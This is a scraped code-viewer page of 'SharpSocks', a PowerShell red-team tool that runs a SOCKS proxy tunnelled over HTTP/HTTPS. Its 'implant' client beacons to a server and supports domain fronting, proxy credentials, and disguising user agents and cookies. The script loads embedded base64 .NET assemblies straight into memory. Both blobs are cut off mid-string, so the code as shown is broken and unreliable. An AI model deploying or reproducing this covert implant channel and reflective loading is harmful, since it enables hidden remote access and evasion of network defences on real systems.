236 lines
122 KiB
PowerShell
236 lines
122 KiB
PowerShell
|
$Global:SocksClientLoaded = $False
|
|||
|
$Global:SocksServerLoaded = $False
|
|||
|
$Global:Socks = $null
|
|||
|
$Global:BoolStart = $null
|
|||
|
$iLogOutput = $null
|
|||
|
$Comms = $null
|
|||
|
function SharpSocks {
|
|||
|
<#
|
|||
|
.Synopsis
|
|||
|
Socks Proxy written in C# for .NET v4
|
|||
|
|
|||
|
Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell
|
|||
|
|
|||
|
SharpSocks 2017 Nettitude
|
|||
|
Rob Maslen @rbmaslen
|
|||
|
|
|||
|
.DESCRIPTION
|
|||
|
PS C:\> Usage: SharpSocks -Uri <Host>
|
|||
|
.EXAMPLE
|
|||
|
Start the server listening on port 127.0.0.1:8081 for connections from the implant and port 1080 for SOCKS connections
|
|||
|
PS C:\> SharpSocks -Server -IPAddress 127.0.0.1 -Uri https://127.0.0.1:8081 -SocksPort 1080
|
|||
|
.EXAMPLE
|
|||
|
Start the server listening on port 127.0.0.1:8081 for connections from the implant and port 1080 for SOCKS connections. Use the provided certificates for the web server that listens for connections from the implant
|
|||
|
PS C:\> SharpSocks -Server -TLSServerCertificate $<X509Certificate2> -IPAddress 127.0.0.1 -Uri https://127.0.0.1:8081 -SocksPort 1080
|
|||
|
.EXAMPLE
|
|||
|
Start the server specfiying the Encryption key and Command Channel Id to be used (these SAME values MUST also be passed to the client)
|
|||
|
PS C:\> SharpSocks -Server -IPAddress 127.0.0.1 -Uri https://127.0.0.1:8081 -SocksPort 1080 -Insecure -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6
|
|||
|
.EXAMPLE
|
|||
|
Start the Implant(Client) specifying the web server (http://127.0.0.1:8081), the encryption keys and channel id. Also specify a list of URLs to use when making HTTP Request. Set the beacon time to 5 seconds
|
|||
|
PS C:\> SharpSocks -Client -Uri http://127.0.0.1:8081 -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6 -URLs "site/review/access.php","upload/data/images" -Beacon 5000
|
|||
|
.EXAMPLE
|
|||
|
Same as above using different list of URLs
|
|||
|
PS C:\> SharpSocks -Client -Uri http://127.0.0.1:8081 -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6 -URLs "Upload","Push","Res" -Beacon 5000
|
|||
|
.EXAMPLE
|
|||
|
Sames as above but connect out via an authenticated proxy server
|
|||
|
PS C:\> SharpSocks -Client -Uri http://127.0.0.1:8081 -ProxyUser bob -ProxyPass pass -ProxyDomain dom -ProxyUrl http://10.150.10.1:8080 -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6 -URLs "Upload","Push","Res" -Beacon 500
|
|||
|
#>
|
|||
|
param(
|
|||
|
[Parameter(Mandatory=$True)][string]$Uri,
|
|||
|
[Parameter(Mandatory=$False)]$URLs="Upload",
|
|||
|
[Parameter(Mandatory=$False)][switch]$Server,
|
|||
|
[Parameter(Mandatory=$False)][switch]$Client,
|
|||
|
[Parameter(Mandatory=$False)][int]$SocksPort=43334,
|
|||
|
[Parameter(Mandatory=$False)][string]$Channel,
|
|||
|
[Parameter(Mandatory=$False)][string]$IPAddress="0.0.0.0",
|
|||
|
[Parameter(Mandatory=$False)][string]$DomainFrontURL,
|
|||
|
[Parameter(Mandatory=$False)][int]$Beacon="2000",
|
|||
|
[Parameter(Mandatory=$False)][string]$Key,
|
|||
|
[Parameter(Mandatory=$False)][switch]$Insecure,
|
|||
|
[Parameter(Mandatory=$False)][string]$UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36",
|
|||
|
[Parameter(Mandatory=$False)][string]$Cookie1="ASP.NET_SessionId",
|
|||
|
[Parameter(Mandatory=$False)][string]$Cookie2="__RequestVerificationToken",
|
|||
|
[Parameter(Mandatory=$False, HelpMessage="Certificate to be used by the web server, must be of type System.Security.Cryptography.X509Certificates.X509Certificate2")][System.Security.Cryptography.X509Certificates.X509Certificate2]$TLSServerCertificate,
|
|||
|
[Parameter(Mandatory=$False)][string]$ProxyURL,
|
|||
|
[Parameter(Mandatory=$False)][string]$ProxyDomain,
|
|||
|
[Parameter(Mandatory=$False)][string]$ProxyUser,
|
|||
|
[Parameter(Mandatory=$False)][string]$ProxyPassword
|
|||
|
)
|
|||
|
|
|||
|
echo "[-] Loading Assemblies"
|
|||
|
if ($psversiontable.CLRVersion.Major -lt 3) {
|
|||
|
echo "Not running on CLRVersion 4 or above. Try 'migrate' to use unmanaged powershell"
|
|||
|
} else {
|
|||
|
if (($SocksClientLoaded -ne "TRUE") -and ($Client.IsPresent)) {
|
|||
|
$Script:SocksClientLoaded = "TRUE"
|
|||
|
echo "[-] Loading Client Assembly"
|
|||
|
$PS = "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
|
|||
|
$DllBytes = [System.Convert]::FromBase64String($PS)
|
|||
|
$Assembly = [System.Reflection.Assembly]::Load($DllBytes)
|
|||
|
echo "[+] Client Assembly Loaded"
|
|||
|
}
|
|||
|
|
|||
|
if (($SocksServerLoaded -ne "TRUE") -and ($Server.IsPresent)) {
|
|||
|
$Script:SocksServerLoaded = "TRUE"
|
|||
|
echo "[-] Loading Server Assembly"
|
|||
|
$PS = "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
|
|||
|
|
|||
|
$DllBytes = [System.Convert]::FromBase64String($PS)
|
|||
|
$Assembly = [System.Reflection.Assembly]::Load($DllBytes)
|
|||
|
echo "[+] Server Server Loaded"
|
|||
|
}
|
|||
|
|
|||
|
if($Insecure.IsPresent) {
|
|||
|
$InsecureSSL=$true
|
|||
|
} else {
|
|||
|
$InsecureSSL=$false
|
|||
|
}
|
|||
|
|
|||
|
if (!$Key) {
|
|||
|
$Key = Create-AesKey
|
|||
|
}
|
|||
|
|
|||
|
$secureStringPwd = $Key | ConvertTo-SecureString -AsPlainText -Force
|
|||
|
|
|||
|
#If there is no channel set
|
|||
|
if (!$Channel) {
|
|||
|
$Channel = Get-RandomChamnnel -Length 25
|
|||
|
}
|
|||
|
|
|||
|
# Proxy Config
|
|||
|
if ($ProxyURL) {
|
|||
|
$Proxy = New-Object System.Net.WebProxy($ProxyURL,$True);
|
|||
|
|
|||
|
if ($ProxyUser -and $ProxyPassword) {
|
|||
|
$creds = new-object System.Net.NetworkCredential
|
|||
|
$creds.UserName = $ProxyUser
|
|||
|
$creds.Domain = $ProxyDomain
|
|||
|
$creds.SecurePassword = ConvertTo-SecureString $ProxyPassword -AsPlainText -Force;
|
|||
|
$Proxy.Credentials = $Creds;
|
|||
|
} else {
|
|||
|
$Proxy.UseDefaultCredentials = $True;
|
|||
|
}
|
|||
|
} else {
|
|||
|
$Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
|
|||
|
$Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
|
|||
|
}
|
|||
|
|
|||
|
# New Uri
|
|||
|
$Uri = [System.Uri]$Uri
|
|||
|
|
|||
|
# Add URLs
|
|||
|
$NewURLs = New-Object "System.Collections.Generic.List[String]"
|
|||
|
foreach ($URL in $URLs) {
|
|||
|
$NewURLs.Add($URL)
|
|||
|
}
|
|||
|
|
|||
|
if ($Server.IsPresent){
|
|||
|
$Script:iLogOutput = New-Object SharpSocksServer.ServerComms.DebugConsoleOutput
|
|||
|
$Script:BoolStart = [SharpSocksServer.Source.Integration.PSSocksServer]::CreateSocksController($IPAddress, $uri, $TLSServerCertificate, $Channel, $SocksPort, $key, $Cookie1, $Cookie2, $iLogOutput);
|
|||
|
if ($BoolStart) {
|
|||
|
echo ""
|
|||
|
echo "[+] SharpSocks server started!"
|
|||
|
echo ""
|
|||
|
echo "-Channel $Channel"
|
|||
|
echo "-Key $Key"
|
|||
|
echo "Cookies: $Cookie1 $Cookie2"
|
|||
|
echo ""
|
|||
|
echo ""
|
|||
|
echo "[-] Run StopSocks to stop the server!"
|
|||
|
echo ""
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
if ($Client.IsPresent){
|
|||
|
$Script:Comms = New-Object SocksProxy.Classes.Integration.PoshDefaultImplantComms
|
|||
|
$Script:Socks = [SocksProxy.Classes.Integration.PoshCreateProxy]::CreateSocksController($Uri, $Channel, $DomainFrontURL, $UserAgent, $secureStringPwd, $NewURLs, $Cookie1, $Cookie2, $Proxy, $Beacon, $Comms, $InsecureSSL);
|
|||
|
$Script:BoolStart = $Socks.Start()
|
|||
|
if ($BoolStart) {
|
|||
|
echo ""
|
|||
|
echo "[+] SharpSocks client Started!"
|
|||
|
echo ""
|
|||
|
echo "URLs:"
|
|||
|
foreach ($URL in $URLs) {
|
|||
|
echo "$($Uri)$($URL)"
|
|||
|
}
|
|||
|
echo "Channel: $Channel"
|
|||
|
echo "Key being used: $Key"
|
|||
|
echo "Beacon: $Beacon"
|
|||
|
echo "Cookies: $Cookie1 $Cookie2"
|
|||
|
echo "User-Agent: $UserAgent"
|
|||
|
echo ""
|
|||
|
echo ""
|
|||
|
echo "[-] Run StopSocks to stop the client!"
|
|||
|
echo ""
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function StopSocks {
|
|||
|
if ($BoolStart) {
|
|||
|
$Script:BoolStart = $Socks.Stop()
|
|||
|
$Script:BoolStart = $Socks.HARDStop()
|
|||
|
echo ""
|
|||
|
echo "[-] SharpSocks stopped!"
|
|||
|
echo ""
|
|||
|
} else {
|
|||
|
echo ""
|
|||
|
echo "[-] SharpSocks not running!"
|
|||
|
echo ""
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
# creates a randon AES symetric encryption key
|
|||
|
function Create-AesManagedObject
|
|||
|
{
|
|||
|
param
|
|||
|
(
|
|||
|
[Object]
|
|||
|
$key,
|
|||
|
[Object]
|
|||
|
$IV
|
|||
|
)
|
|||
|
|
|||
|
$aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
|
|||
|
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
|
|||
|
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
|
|||
|
$aesManaged.BlockSize = 128
|
|||
|
$aesManaged.KeySize = 256
|
|||
|
if ($IV)
|
|||
|
{
|
|||
|
if ($IV.getType().Name -eq 'String')
|
|||
|
{$aesManaged.IV = [System.Convert]::FromBase64String($IV)}
|
|||
|
else
|
|||
|
{$aesManaged.IV = $IV}
|
|||
|
}
|
|||
|
if ($key)
|
|||
|
{
|
|||
|
if ($key.getType().Name -eq 'String')
|
|||
|
{$aesManaged.Key = [System.Convert]::FromBase64String($key)}
|
|||
|
else
|
|||
|
{$aesManaged.Key = $key}
|
|||
|
}
|
|||
|
$aesManaged
|
|||
|
}
|
|||
|
|
|||
|
# creates a randon AES symetric encryption key
|
|||
|
function Create-AesKey()
|
|||
|
{
|
|||
|
$aesManaged = Create-AesManagedObject
|
|||
|
$aesManaged.GenerateKey()
|
|||
|
[System.Convert]::ToBase64String($aesManaged.Key)
|
|||
|
}
|
|||
|
|
|||
|
function Get-RandomChamnnel
|
|||
|
{
|
|||
|
param ([int]$Length)
|
|||
|
$set = 'abcdefghijklmnopqrstuvwxyz0123456789'.ToCharArray()
|
|||
|
$result = ''
|
|||
|
for ($x = 0; $x -lt $Length; $x++)
|
|||
|
{
|
|||
|
$result += $set | Get-Random
|
|||
|
}
|
|||
|
return $result
|
|||
|
}
|